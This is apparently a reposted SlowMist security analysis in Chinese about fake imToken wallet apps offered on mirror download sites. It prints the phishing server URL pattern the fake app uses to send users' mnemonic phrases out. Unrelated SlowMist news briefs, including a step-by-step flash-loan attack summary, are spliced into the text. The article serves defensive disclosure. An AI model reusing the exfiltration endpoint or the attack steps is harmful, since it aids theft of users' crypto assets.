原文作者:?山&耀
技术的Web3正在驱动下一代技术革命,越来越多的人开始参与到这场加密浪潮中,但Web3与Web2是两个截然不同的世界。Web3世界是一个充满着各种各样的机遇以及危险的黑暗森林,身处Web3世界中,钱包则是进入Web3世界的入口以及通行证。
当你通过钱包在Web3世界中探索体验诸多的区块链相关应用和网站的过程中,你会发现在一条公链上每个应用都是使用钱包“登录”;这与我们传统意义上的“登录”不同,在Web2世界中,每个应用之间的账户不全是互通的。但在Web3的世界中,所有应用都是统一使用钱包去进行“登录”,我们可以看到“登录”钱包时显示的不是“LoginwithWallet”,取而代之的是“ConnectWallet”。而钱包是你在Web3世界中的唯一通行证。
慢雾:NimbusPlatform遭遇闪电贷攻击,损失278枚BNB:据慢雾安全团队情报,2022 年 12 月 14 日, BSC 链上的NimbusPlatform项目遭到攻击,攻击者获利约278枚BNB。慢雾安全团队以简讯的形式分享如下:
1. 攻击者首先在 8 天前执行了一笔交易(0x7d2d8d),把 20 枚 BNB 换成 NBU_WBNB 再换成 GNIMB 代币,然后把 GNIMB 代币转入 Staking 合约作质押,为攻击作准备;
2. 在 8 天后正式发起攻击交易(0x42f56d3),首先通过闪电贷借出 75477 枚 BNB 并换成 NBU_WBNB,然后再用这些 NBU_WBNB 代币将池子里的绝大部分 NIMB 代币兑换出;
3. 接着调用 Staking 合约的 getReward 函数进行奖励的提取,奖励的计算是和 rate 的值正相关的,而 rate 的值则取决于池子中 NIMB 代币和 GNIMB 代币的价格,由于 NIMB 代币的价格是根据上一步闪电贷中被操控的池子中的代币数量来计算的,导致其由于闪电贷兑换出大量的代币而变高,最后计算的奖励也会更多;
4. 攻击者最后将最后获得的 GNIMB 代币和拥有的 NIMB 代币换成 NBU_WBNB 代币后再换成 BNB,归还闪电贷获利;
此次攻击的主要原因在于计算奖励的时候仅取决于池子中的代币数量导致被闪电贷操控,从而获取比预期更多的奖励。慢雾安全团队建议在进行代币奖计算时应确保价格来源的安全性。[2022/12/14 21:44:29]
俗话说高楼之下必有阴影,在如此火热的Web3世界里,钱包作为入口级应用,自然也被黑灰产业链盯上。
慢雾:BXH 第一次被盗资金再次转移,BTC 网络余额超 2700 BTC:金色财经报道,10月8日凌晨(UTC+8),慢雾监控到 BXH 第一次被盗资金再次出现异动,经慢雾 MistTrack 分析,异动详情如下:
黑客地址 0x48c9...7d79 将部分资金(213.77 BTCB,5 BNB 和 1 ETH)转移至新地址 0xc01f...2aef,接着将资金兑换为 renBTC 跨链到 BTC 网络,跨链后地址为 1JwQ...u9oU。1JwQ...u9oU 在此次转移中接收到的总资金为 204.12 BTC。截止目前,BXH 第一次被盗事件在 BTC 网络共有 4 个黑客地址,总计余额为 2701.3 BTC,暂未进一步转移。慢雾 MistTrack 将持续监控被盗资金的转移。[2022/10/8 12:49:28]
在Android环境下,由于很多手机不支持GooglePlay或者因为网络问题,很多人会从其他途径下载GooglePlay的应用,比如:apkcombo、apkpure等第三方下载站,这些站点往往标榜自己App是从GooglePlay镜像下载的,但是其真实安全性如何呢?
慢雾:BSC链上项目BXH遭受攻击分析:10月30日消息,据慢雾区情报,2021年10月30日,币安智能链上(BSC)去中心化交易协议BXH项目遭受攻击,被盗约1.3亿美金。经慢雾安全团队分析,黑客于27日13时(UTC)部署了攻击合约0x8877,接着在29日08时(UTC)BXH项目管理钱包地址0x5614通过grantRole赋予攻击合约0x8877管理权限。30日03时(UTC)攻击者通过攻击合约0x8877的权限从BXH策略池资金库中将其管理的资产转出。30日04时(UTC)0x5614暂停了资金库。因此BXH本次被盗是由于其管理权限被恶意的修改,导致攻击者利用此权限转移了项目资产。[2021/10/30 6:22:02]
据数据统计站点similarweb统计,apkcombo站点:
慢雾: 警惕比特币RBF风险:据BitMEX消息,比特币于区块高度666833出现陈腐区块,并产生了一笔 0.00062063 BTC 的双花交易。根据 BitMEX提供的交易内容来看,双花的两笔交易的nSequence字段的值都小于0xffffffff -1。慢雾安全团队初步认为此次双花交易有可能是比特币中的RBF交易。[2021/1/20 16:38:01]
全球排名:?1,?809?
国家排名:?7,?370?
品类排名:?168?
我们可以看到它的影响力和流量都非常大。
它默认提供了一款chromeAPK下载插件,我们发现这款插件的用户数达到了10W:
那么回到我们关注的Web3领域中钱包方向,用户如果从这里下载的钱包应用安全性如何?
我们拿知名的imToken钱包为例,其GooglePlay的正规下载途径为:
https://play.google.com/store/apps/details??id=im.token.app
由于很多手机不支持GooglePlay或者因为网络问题,很多人会从这里下载GooglePlay的应用。
而apkcombo镜像站的下载路径为:
https://apkcombo.com/downloader/#package=im.token.app
上图我们可以发现,apkcombo提供的版本为24.9.11?,经由imToken确认后,这是一个并不存在的版本!证实这是目前市面上假imToken钱包最多的一个版本。
在编写本文时imToken钱包的最新版本为2.11.3?,此款钱包的版本号很高,显然是为了伪装成一个最新版本而设置的。
如下图,我们在apkcombo上发现,此假钱包版本显示下载量较大,此处的下载量应该是爬取的GooglePlay的下载量信息,安全起见,我们觉得有必要披露这个恶意App的来源,防止更多的人下载到此款假钱包。
同时我们发现类似的下载站还有如:uptodown
下载地址:https://imtoken.br.uptodown.com/android
我们发现uptodown任意注册即可发布App,这导致钓鱼的成本变得极低:
慢雾:假钱包App已致上万人被盗,损失高达十三亿美元》,所以在此不再赘述。
我们仅对apkcombo提供版本为24.9.11这款假钱包进行分析,在开始界面创建钱包或导入钱包助记词时,虚假钱包会将助记词等信息发送到钓鱼网站的服务端去,如下图:
根据逆向APK代码和实际分析流量包发现,助记词发送方式:
https://api.funnel.rocks/api/trust??aid=?10&wt=?1&os=?1&key=<助记词>
看下图,最早的“api.funnel.rocks”证书出现在2022-06-03?,也就是攻击开始的大概时间:
俗话说一图胜千言,最后我们画一个流程图:
交易所时请认准官方下载渠道并从多方进行验证;如果你的钱包从上述镜像站下载,请第一时间转移资产并卸载该软件,必要时可通过官方验证通道核实。
同时,如需使用钱包,请务必认准以下主流钱包App官方网址:
1?/imToken钱包:https://token.im/
2?/TokenPocket钱包:https://www.tokenpocket.pro/
3?/TronLink钱包:https://www.tronlink.org/
4?/比特派钱包:https://bitpie.com/
5?/MetaMask钱包:https://metamask.io/
6?/TrustWallet:https://trustwallet.com/
请持续关注慢雾安全团队,更多Web3安全风险分析与告警正在路上。
致谢:感谢在溯源过程中imToken官方提供的验证支持。
由于保密性和隐私性,本文只是冰山一角。慢雾在此建议,用户需加强对安全知识的了解,进一步强化甄别网络钓鱼攻击的能力等,避免遭遇此类攻击。更多的安全知识建议阅读慢雾出品的《区块链黑暗森林自救手册》。
郑重声明: 本文版权归原作者所有, 转载文章仅为传播更多信息之目的, 如作者信息标记有误, 请第一时间联系我们修改或删除, 多谢。